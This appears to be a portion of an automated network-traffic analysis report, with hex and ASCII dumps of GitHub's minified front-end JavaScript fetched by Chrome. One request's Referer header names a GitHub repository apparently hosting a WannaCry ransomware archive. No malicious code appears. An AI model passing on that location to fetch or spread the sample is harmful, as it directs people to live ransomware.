                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 73 75 62 73 63 72 69 70 74 69 6f 6e 73 53 75 62 74 69 74 6c 65 2e 74 6f 67 67 6c 65 41 74 74 72 69 62 75 74 65 28 22 68 69 64 64 65 6e 22 2c 21 31 29 2c 74 68 69 73 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 73 43 6f 6e 74 61 69 6e 65 72 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 22 22 7d 7d 7d 75 70 64 61 74 65 53 6f 63 69 61 6c 43 6f 75 6e 74 28 65 29 7b 74 68 69 73 2e 73 6f 63 69 61 6c 43 6f 75 6e 74 26 26 28 74 68 69 73 2e 73 6f 63 69 61 6c 43 6f 75 6e 74 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 65 2c 74 68 69 73 2e 73 6f 63 69 61 6c 43 6f 75 6e 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6c 61 62 65 6c 22 2c 60 24 7b 74 68 69 73 2e 70 6c 75 72 61 6c 69 7a 65 55 73 65 72 73 28 65 29 7d 20 77 61 74 63 68 69 6e 67 20 74 68 69 73 20 72 65 70 6f
                                                                                      Data Ascii: subscriptionsSubtitle.toggleAttribute("hidden",!1),this.subscriptionsContainer.textContent=""}}}updateSocialCount(e){this.socialCount&&(this.socialCount.textContent=e,this.socialCount.setAttribute("aria-label",`${this.pluralizeUsers(e)} watching this repo
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 72 69 62 75 74 65 28 22 68 69 64 64 65 6e 22 2c 21 31 29 2c 74 68 69 73 2e 63 75 73 74 6f 6d 44 69 61 6c 6f 67 2e 74 6f 67 67 6c 65 41 74 74 72 69 62 75 74 65 28 22 68 69 64 64 65 6e 22 2c 21 30 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 7b 74 68 69 73 2e 63 75 73 74 6f 6d 42 75 74 74 6f 6e 2e 66 6f 63 75 73 28 29 7d 2c 30 29 7d 72 65 73 65 74 46 69 6c 74 65 72 4c 61 62 65 6c 73 44 69 61 6c 6f 67 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 65 2e 73 74 6f 70 50 72 6f 70 61 67 61 74 69 6f 6e 28 29 3b 66 6f 72 28 6c 65 74 20 65 3d 30 3b 65 3c 74 68 69 73 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 73 4c 61 62 65 6c 73 2e 6c 65 6e 67 74 68 3b 65 2b 2b 29 7b 6c 65 74 20 74 3d 74 68 69 73 2e 73 75 62 73 63 72 69 70 74 69 6f 6e 73 4c
                                                                                      Data Ascii: ribute("hidden",!1),this.customDialog.toggleAttribute("hidden",!0),setTimeout(()=>{this.customButton.focus()},0)}resetFilterLabelsDialog(e){e.preventDefault(),e.stopPropagation();for(let e=0;e<this.subscriptionsLabels.length;e++){let t=this.subscriptionsL
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 70 61 67 61 74 69 6f 6e 28 29 2c 74 68 69 73 2e 73 61 76 65 43 75 72 72 65 6e 74 4c 61 62 65 6c 73 53 74 61 74 65 28 29 2c 74 68 69 73 2e 68 69 64 65 46 69 6c 74 65 72 53 75 62 74 69 74 6c 65 28 29 2c 74 68 69 73 2e 65 6e 61 62 6c 65 49 73 73 75 65 73 43 68 65 63 6b 62 6f 78 28 29 2c 74 68 69 73 2e 63 6c 6f 73 65 46 69 6c 74 65 72 4c 61 62 65 6c 73 44 69 61 6c 6f 67 28 65 29 7d 65 6e 61 62 6c 65 49 73 73 75 65 73 43 68 65 63 6b 62 6f 78 28 29 7b 6c 65 74 20 65 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 74 68 69 73 2e 6c 61 73 74 41 70 70 6c 69 65 64 4c 61 62 65 6c 73 29 2e 6c 65 6e 67 74 68 3e 30 3b 65 26 26 74 68 69 73 2e 74 68 72 65 61 64 54 79 70 65 43 68 65 63 6b 62 6f 78 65 73 2e 6c 65 6e 67 74 68 3e 30 26 26 28 74 68 69 73 2e 74 68 72 65 61 64 54 79 70
                                                                                      Data Ascii: pagation(),this.saveCurrentLabelsState(),this.hideFilterSubtitle(),this.enableIssuesCheckbox(),this.closeFilterLabelsDialog(e)}enableIssuesCheckbox(){let e=Object.keys(this.lastAppliedLabels).length>0;e&&this.threadTypeCheckboxes.length>0&&(this.threadTyp
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 6e 3d 6c 3c 33 3f 74 3a 6e 75 6c 6c 3d 3d 3d 69 3f 69 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 74 2c 6f 29 3a 69 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 2e 64 65 63 6f 72 61 74 65 29 6e 3d 52 65 66 6c 65 63 74 2e 64 65 63 6f 72 61 74 65 28 65 2c 74 2c 6f 2c 69 29 3b 65 6c 73 65 20 66 6f 72 28 76 61 72 20 61 3d 65 2e 6c 65 6e 67 74 68 2d 31 3b 61 3e 3d 30 3b 61 2d 2d 29 28 73 3d 65 5b 61 5d 29 26 26 28 6e 3d 28 6c 3c 33 3f 73 28 6e 29 3a 6c 3e 33 3f 73 28 74 2c 6f 2c 6e 29 3a 73 28 74 2c 6f 29 29 7c 7c 6e 29 3b 72 65 74 75 72 6e 20 6c 3e 33 26 26 6e 26 26 4f 62 6a 65 63 74
                                                                                      Data Ascii: n=l<3?t:null===i?i=Object.getOwnPropertyDescriptor(t,o):i;if("object"==typeof Reflect&&"function"==typeof Reflect.decorate)n=Reflect.decorate(e,t,o,i);else for(var a=e.length-1;a>=0;a--)(s=e[a])&&(n=(l<3?s(n):l>3?s(t,o,n):s(t,o))||n);return l>3&&n&&Object
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 65 63 74 2e 64 65 63 6f 72 61 74 65 29 6e 3d 52 65 66 6c 65 63 74 2e 64 65 63 6f 72 61 74 65 28 65 2c 74 2c 6f 2c 69 29 3b 65 6c 73 65 20 66 6f 72 28 76 61 72 20 61 3d 65 2e 6c 65 6e 67 74 68 2d 31 3b 61 3e 3d 30 3b 61 2d 2d 29 28 73 3d 65 5b 61 5d 29 26 26 28 6e 3d 28 6c 3c 33 3f 73 28 6e 29 3a 6c 3e 33 3f 73 28 74 2c 6f 2c 6e 29 3a 73 28 74 2c 6f 29 29 7c 7c 6e 29 3b 72 65 74 75 72 6e 20 6c 3e 33 26 26 6e 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 6f 2c 6e 29 2c 6e 7d 75 28 5b 73 2e 66 41 5d 2c 63 2e 70 72 6f 74 6f 74 79 70 65 2c 22 64 65 74 61 69 6c 73 22 2c 76 6f 69 64 20 30 29 2c 63 3d 75 28 5b 73 2e 49 68 5d 2c 63 29 3b 6c 65 74 20 70 3d 28 28 69 3d 63 6c 61 73 73 20 4e 6f 74 69 66 69 63 61 74 69 6f 6e 73 44 69 61
                                                                                      Data Ascii: ect.decorate)n=Reflect.decorate(e,t,o,i);else for(var a=e.length-1;a>=0;a--)(s=e[a])&&(n=(l<3?s(n):l>3?s(t,o,n):s(t,o))||n);return l>3&&n&&Object.defineProperty(t,o,n),n}u([s.fA],c.prototype,"details",void 0),c=u([s.Ih],c);let p=((i=class NotificationsDia
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 6c 6f 67 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 6e 61 62 6c 65 41 70 70 6c 79 42 75 74 74 6f 6e 41 6e 64 43 68 65 63 6b 62 6f 78 28 29 2c 21 31 7d 65 6e 61 62 6c 65 41 70 70 6c 79 42 75 74 74 6f 6e 41 6e 64 43 68 65 63 6b 62 6f 78 28 29 7b 6c 65 74 20 65 3d 74 68 69 73 2e 63 75 73 74 6f 6d 44 69 61 6c 6f 67 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 27 5b 64 61 74 61 2d 74 79 70 65 3d 22 6c 61 62 65 6c 22 5d 3a 63 68 65 63 6b 65 64 27 29 3b 65 2e 6c 65 6e 67 74 68 3e 30 26 26 28 74 68 69 73 2e 61 70 70 6c 79 42 75 74 74 6f 6e 2e 72 65 6d 6f 76 65 41 74 74 72 69 62 75 74 65 28 22 64 69 73 61 62 6c 65 64 22 29 2c 74 68 69 73 2e 74 68 72 65 61 64 54 79 70 65 43 68 65 63 6b 62 6f 78 65 73 5b 30 5d 2e 63 68 65 63 6b 65 64 3d 21 30 29 7d 74
                                                                                      Data Ascii: log(){return this.enableApplyButtonAndCheckbox(),!1}enableApplyButtonAndCheckbox(){let e=this.customDialog.querySelectorAll('[data-type="label"]:checked');e.length>0&&(this.applyButton.removeAttribute("disabled"),this.threadTypeCheckboxes[0].checked=!0)}t
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 20 6f 66 20 74 79 70 65 20 48 54 4d 4c 46 6f 72 6d 45 6c 65 6d 65 6e 74 2e 22 29 3b 69 66 28 21 28 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 29 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 73 70 65 63 69 66 69 65 64 20 65 6c 65 6d 65 6e 74 20 69 73 20 6e 6f 74 20 6f 66 20 74 79 70 65 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 2e 22 29 3b 69 66 28 22 73 75 62 6d 69 74 22 21 3d 3d 74 2e 74 79 70 65 29 74 68 72 6f 77 20 54 79 70 65 45 72 72 6f 72 28 22 54 68 65 20 73 70 65 63 69 66 69 65 64 20 65 6c 65 6d 65 6e 74 20 69 73 20 6e 6f 74 20 61 20 73 75 62 6d 69 74 20 62 75 74 74 6f 6e 2e 22 29 3b 69 66 28 21 65 7c 7c 65 21 3d 3d 74 2e 66 6f 72 6d 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 54 68 65 20 73 70 65 63 69 66
                                                                                      Data Ascii: of type HTMLFormElement.");if(!(t instanceof HTMLElement))throw TypeError("The specified element is not of type HTMLElement.");if("submit"!==t.type)throw TypeError("The specified element is not a submit button.");if(!e||e!==t.form)throw Error("The specif
                                                                                      2024-03-23 14:47:24 UTC510INData Raw: 6c 75 65 7c 7c 69 3b 6f 7c 7c 28 28 6f 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 74 79 70 65 3d 22 68 69 64 64 65 6e 22 2c 6f 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 6a 73 2d 73 75 62 6d 69 74 2d 62 75 74 74 6f 6e 2d 76 61 6c 75 65 22 29 2c 74 2e 70 72 65 70 65 6e 64 28 6f 29 29 2c 6f 2e 6e 61 6d 65 3d 65 2e 6e 61 6d 65 2c 6f 2e 76 61 6c 75 65 3d 73 7d 65 6c 73 65 20 6f 26 26 6f 2e 72 65 6d 6f 76 65 28 29 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 6c 65 74 20 74 3d 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 69 6e 70 75 74 2e 6a 73 2d 73 75 62 6d 69 74 2d 62 75 74 74 6f 6e 2d 76 61 6c 75 65 22 29 3b 72 65 74 75 72 6e 20 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 49 6e 70
                                                                                      Data Ascii: lue||i;o||((o=document.createElement("input")).type="hidden",o.classList.add("js-submit-button-value"),t.prepend(o)),o.name=e.name,o.value=s}else o&&o.remove()}function s(e){let t=e.querySelector("input.js-submit-button-value");return t instanceof HTMLInp


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      44192.168.2.1649748185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:23 UTC645OUTGET /assets/code-menu-614feb194539.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:24 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 15466
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 22 Feb 2024 16:53:09 GMT
                                                                                      ETag: 0x8DC33C6BFD75417
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:24 GMT
                                                                                      Age: 1559311
                                                                                      X-Served-By: cache-iad-kiad7000097-IAD, cache-lga21966-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 478, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 0094c5ffc36fd98a6f3364e393035f1a97d29145
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 63 6f 64 65 2d 6d 65 6e 75 22 5d 2c 7b 33 38 39 37 34 3a 28 65 2c 74 2c 6f 29 3d 3e 7b 6f 28 32 35 39 39 39 29 7d 2c 37 36 32 35 30 3a 28 65 2c 74 2c 6f 29 3d 3e 7b 6f 2e 64 28 74 2c 7b 24 53 3a 28 29 3d 3e 72 2c 46 6b 3a 28 29 3d 3e 61 2c 73 7a 3a 28 29 3d 3e 69 7d 29 3b 76 61 72 20 6e 3d 6f 28 34 33 37 38 36 29 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 2c 74 2c 6f 29 7b 6c 65 74 20 72 3d 7b 68 79 64 72 6f 45 76 65 6e 74 50 61 79 6c 6f 61 64 3a 65 2c 68 79 64 72 6f 45 76 65 6e 74 48 6d 61 63 3a 74 2c 76 69 73 69 74 6f 72 50 61 79 6c 6f
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["code-menu"],{38974:(e,t,o)=>{o(25999)},76250:(e,t,o)=>{o.d(t,{$S:()=>r,Fk:()=>a,sz:()=>i});var n=o(43786);function r(e,t,o){let r={hydroEventPayload:e,hydroEventHmac:t,visitorPaylo
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 72 28 74 2c 6f 29 3a 6e 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 52 65 66 6c 65 63 74 2e 64 65 63 6f 72 61 74 65 29 69 3d 52 65 66 6c 65 63 74 2e 64 65 63 6f 72 61 74 65 28 65 2c 74 2c 6f 2c 6e 29 3b 65 6c 73 65 20 66 6f 72 28 76 61 72 20 73 3d 65 2e 6c 65 6e 67 74 68 2d 31 3b 73 3e 3d 30 3b 73 2d 2d 29 28 72 3d 65 5b 73 5d 29 26 26 28 69 3d 28 61 3c 33 3f 72 28 69 29 3a 61 3e 33 3f 72 28 74 2c 6f 2c 69 29 3a 72 28 74 2c 6f 29 29 7c 7c 69 29 3b 72 65 74 75 72 6e 20 61 3e 33 26 26 69 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 6f 2c 69 29 2c 69 7d 6c 65 74 7b 67 65 74 49 74 65 6d 3a 6c 2c 73 65 74 49 74 65 6d 3a 63 7d
                                                                                      Data Ascii: r(t,o):n;if("object"==typeof Reflect&&"function"==typeof Reflect.decorate)i=Reflect.decorate(e,t,o,n);else for(var s=e.length-1;s>=0;s--)(r=e[s])&&(i=(a<3?r(i):a>3?r(t,o,i):r(t,o))||i);return a>3&&i&&Object.defineProperty(t,o,i),i}let{getItem:l,setItem:c}
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 63 65 64 43 6f 64 65 73 70 61 63 65 54 61 62 44 65 66 61 75 6c 74 26 26 74 68 69 73 2e 66 6f 72 63 65 43 6f 64 65 73 70 61 63 65 54 61 62 44 65 66 61 75 6c 74 3f 28 74 68 69 73 2e 68 61 73 46 6f 72 63 65 64 43 6f 64 65 73 70 61 63 65 54 61 62 44 65 66 61 75 6c 74 3d 21 30 2c 74 68 69 73 2e 73 65 6c 65 63 74 44 65 66 61 75 6c 74 54 61 62 28 21 30 29 29 3a 74 68 69 73 2e 73 65 6c 65 63 74 44 65 66 61 75 6c 74 54 61 62 28 21 31 29 3b 6c 65 74 20 65 3d 74 68 69 73 2e 63 6f 70 69 6c 6f 74 54 69 70 3b 65 26 26 28 30 2c 69 2e 46 6b 29 28 65 29 7d 7d 6f 6e 44 65 74 61 69 6c 73 4b 65 79 64 6f 77 6e 28 65 29 7b 69 66 28 22 45 73 63 61 70 65 22 3d 3d 3d 65 2e 6b 65 79 29 7b 74 68 69 73 2e 6d 6f 64 61 6c 2e 68 69 64 64 65 6e 3d 21 30 3b 6c 65 74 20 74 3d 65 2e 74 61
                                                                                      Data Ascii: cedCodespaceTabDefault&&this.forceCodespaceTabDefault?(this.hasForcedCodespaceTabDefault=!0,this.selectDefaultTab(!0)):this.selectDefaultTab(!1);let e=this.copilotTip;e&&(0,i.Fk)(e)}}onDetailsKeydown(e){if("Escape"===e.key){this.modal.hidden=!0;let t=e.ta
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 6f 74 79 70 65 2c 22 63 6f 64 65 73 70 61 63 65 46 6f 72 6d 22 2c 76 6f 69 64 20 30 29 2c 73 28 5b 6e 2e 66 41 5d 2c 75 2e 70 72 6f 74 6f 74 79 70 65 2c 22 63 6f 64 65 73 70 61 63 65 4c 6f 61 64 69 6e 67 4d 65 6e 75 22 2c 76 6f 69 64 20 30 29 2c 73 28 5b 6e 2e 66 41 5d 2c 75 2e 70 72 6f 74 6f 74 79 70 65 2c 22 63 6f 64 65 73 70 61 63 65 4c 69 73 74 22 2c 76 6f 69 64 20 30 29 2c 73 28 5b 6e 2e 66 41 5d 2c 75 2e 70 72 6f 74 6f 74 79 70 65 2c 22 63 6f 64 65 73 70 61 63 65 53 65 6c 65 63 74 6f 72 22 2c 76 6f 69 64 20 30 29 2c 73 28 5b 6e 2e 66 41 5d 2c 75 2e 70 72 6f 74 6f 74 79 70 65 2c 22 6f 70 65 6e 4f 72 43 72 65 61 74 65 49 6e 43 6f 64 65 73 70 61 63 65 22 2c 76 6f 69 64 20 30 29 2c 73 28 5b 6e 2e 66 41 5d 2c 75 2e 70 72 6f 74 6f 74 79 70 65 2c 22 76 73
                                                                                      Data Ascii: otype,"codespaceForm",void 0),s([n.fA],u.prototype,"codespaceLoadingMenu",void 0),s([n.fA],u.prototype,"codespaceList",void 0),s([n.fA],u.prototype,"codespaceSelector",void 0),s([n.fA],u.prototype,"openOrCreateInCodespace",void 0),s([n.fA],u.prototype,"vs
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 74 29 7d 6c 65 74 20 73 3d 61 2e 57 36 3f 69 3a 28 30 2c 6e 2e 5a 29 28 69 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 65 29 7b 72 65 74 75 72 6e 20 73 28 29 2e 68 61 73 28 65 2e 74 6f 55 70 70 65 72 43 61 73 65 28 29 29 7d 6c 65 74 20 63 3d 7b 69 73 46 65 61 74 75 72 65 45 6e 61 62 6c 65 64 3a 6c 7d 7d 2c 35 34 35 30 38 3a 28 65 2c 74 2c 6f 29 3d 3e 7b 6f 2e 64 28 74 2c 7b 41 37 3a 28 29 3d 3e 6c 2c 6b 6f 3a 28 29 3d 3e 73 2c 71 31 3a 28 29 3d 3e 69 7d 29 3b 76 61 72 20 6e 3d 6f 28 31 35 32 30 35 29 2c 72 3d 6f 28 37 31 32 30 37 29 3b 6c 65 74 20 61 3d 28 30 2c 6e 2e 5a 29 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 2e 6e 34 3f 2e 68 65 61 64 3f 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 6d 65 74 61 5b 6e 61 6d 65 3d 22 72 75 6e 74 69 6d
                                                                                      Data Ascii: t)}let s=a.W6?i:(0,n.Z)(i);function l(e){return s().has(e.toUpperCase())}let c={isFeatureEnabled:l}},54508:(e,t,o)=>{o.d(t,{A7:()=>l,ko:()=>s,q1:()=>i});var n=o(15205),r=o(71207);let a=(0,n.Z)(function(){return r.n4?.head?.querySelector('meta[name="runtim
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 6f 66 20 45 72 72 6f 72 26 26 65 2e 6d 65 73 73 61 67 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2e 69 6e 63 6c 75 64 65 73 28 22 71 75 6f 74 61 22 29 29 74 68 72 6f 77 20 65 7d 7d 2c 72 65 6d 6f 76 65 49 74 65 6d 3a 75 2c 63 6c 65 61 72 3a 6c 2e 63 6c 65 61 72 2c 6b 65 79 3a 6c 2e 6b 65 79 2c 67 65 74 20 6c 65 6e 67 74 68 28 29 7b 72 65 74 75 72 6e 20 6c 2e 6c 65 6e 67 74 68 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 72 65 74 75 72 6e 20 69 28 65 2c 7b 74 68 72 6f 77 51 75 6f 74 61 45 72 72 6f 72 73 4f 6e 53 65 74 3a 21 31 7d 2c 77 69 6e 64 6f 77 2c 4a 53 4f 4e 2e 70 61 72 73 65 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 29 7d 7d 2c 37 31 32 30 37 3a 28 65 2c 74 2c 6f 29 3d 3e 7b 6f 2e 64 28 74 2c 7b 51 67 3a 28 29 3d 3e 6e 2e 51 67 2c 57 36
                                                                                      Data Ascii: of Error&&e.message.toLowerCase().includes("quota"))throw e}},removeItem:u,clear:l.clear,key:l.key,get length(){return l.length}}}function s(e){return i(e,{throwQuotaErrorsOnSet:!1},window,JSON.parse,JSON.stringify)}},71207:(e,t,o)=>{o.d(t,{Qg:()=>n.Qg,W6
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 6e 3b 6c 65 74 20 65 3d 6e 2e 6e 34 3f 2e 68 65 61 64 3f 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 6d 65 74 61 5b 6e 61 6d 65 3d 22 62 72 6f 77 73 65 72 2d 73 74 61 74 73 2d 75 72 6c 22 5d 27 29 3f 2e 63 6f 6e 74 65 6e 74 3b 69 66 28 21 65 29 72 65 74 75 72 6e 3b 6c 65 74 20 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 5b 5d 2c 6f 3d 65 2e 6d 61 70 28 65 3d 3e 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 65 29 29 3b 66 6f 72 28 3b 6f 2e 6c 65 6e 67 74 68 3e 30 3b 29 74 2e 70 75 73 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 65 2e 73 68 69 66 74 28 29 2c 6f 3d 5b 74 5d 2c 6e 3d 74 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 3b 65 2e 6c 65 6e 67 74 68 3e 30 26 26 6e 3c 3d 36 35 35 33 36 3b 29 7b 6c 65 74 20 74 3d 65 5b 30 5d 2e
                                                                                      Data Ascii: n;let e=n.n4?.head?.querySelector('meta[name="browser-stats-url"]')?.content;if(!e)return;let t=function(e){let t=[],o=e.map(e=>JSON.stringify(e));for(;o.length>0;)t.push(function(e){let t=e.shift(),o=[t],n=t.length;for(;e.length>0&&n<=65536;){let t=e[0].
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 74 29 29 69 66 28 65 2e 74 79 70 65 3d 3d 3d 6f 2e 74 79 70 65 29 7b 6c 65 74 20 6e 3d 74 2e 63 6c 6f 73 65 73 74 28 6f 2e 74 61 67 29 3b 72 2e 68 61 73 28 6e 29 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 6e 5b 6f 2e 6d 65 74 68 6f 64 5d 26 26 6e 5b 6f 2e 6d 65 74 68 6f 64 5d 28 65 29 3b 6c 65 74 20 61 3d 74 2e 67 65 74 52 6f 6f 74 4e 6f 64 65 28 29 3b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 68 61 64 6f 77 52 6f 6f 74 26 26 72 2e 68 61 73 28 61 2e 68 6f 73 74 29 26 26 61 2e 68 6f 73 74 2e 6d 61 74 63 68 65 73 28 6f 2e 74 61 67 29 29 7b 6c 65 74 20 74 3d 61 2e 68 6f 73 74 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 5b 6f 2e 6d 65 74 68 6f 64 5d 26 26 74 5b 6f 2e 6d 65 74 68 6f 64 5d 28 65 29 7d 7d 7d 66 75
                                                                                      Data Ascii: t))if(e.type===o.type){let n=t.closest(o.tag);r.has(n)&&"function"==typeof n[o.method]&&n[o.method](e);let a=t.getRootNode();if(a instanceof ShadowRoot&&r.has(a.host)&&a.host.matches(o.tag)){let t=a.host;"function"==typeof t[o.method]&&t[o.method](e)}}}fu
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 68 69 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6f 2c 65 7c 7c 22 22 29 7d 7d 3b 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 74 3f 61 3d 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 67 65 74 28 29 7b 72 65 74 75 72 6e 20 4e 75 6d 62 65 72 28 74 68 69 73 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 6f 29 7c 7c 30 29 7d 2c 73 65 74 28 65 29 7b 74 68 69 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 6f 2c 65 29 7d 7d 3a 22 62 6f 6f 6c 65 61 6e 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 61 3d 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 67 65 74 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 6f 29 7d 2c 73 65 74 28 65 29 7b 74 68 69 73 2e 74 6f 67 67 6c 65 41 74 74 72 69 62 75 74 65 28 6f 2c 65 29 7d 7d 29
                                                                                      Data Ascii: his.setAttribute(o,e||"")}};"number"==typeof t?a={configurable:!0,get(){return Number(this.getAttribute(o)||0)},set(e){this.setAttribute(o,e)}}:"boolean"==typeof t&&(a={configurable:!0,get(){return this.hasAttribute(o)},set(e){this.toggleAttribute(o,e)}})
                                                                                      2024-03-23 14:47:24 UTC1378INData Raw: 2c 74 29 7b 72 65 74 75 72 6e 20 74 7d 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 28 65 2c 74 29 7b 76 61 72 20 6f 2c 6e 3b 65 2e 74 6f 67 67 6c 65 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 63 61 74 61 6c 79 73 74 22 2c 21 30 29 2c 63 75 73 74 6f 6d 45 6c 65 6d 65 6e 74 73 2e 75 70 67 72 61 64 65 28 65 29 2c 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 6c 65 74 20 74 20 6f 66 20 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 74 65 6d 70 6c 61 74 65 5b 64 61 74 61 2d 73 68 61 64 6f 77 72 6f 6f 74 5d 22 29 29 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 3d 3d 3d 65 26 26 65 2e 61 74 74 61 63 68 53 68 61 64 6f 77 28 7b 6d 6f 64 65 3a 22 63 6c 6f 73 65 64 22 3d 3d 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61
                                                                                      Data Ascii: ,t){return t}connectedCallback(e,t){var o,n;e.toggleAttribute("data-catalyst",!0),customElements.upgrade(e),!function(e){for(let t of e.querySelectorAll("template[data-shadowroot]"))t.parentElement===e&&e.attachShadow({mode:"closed"===t.getAttribute("data


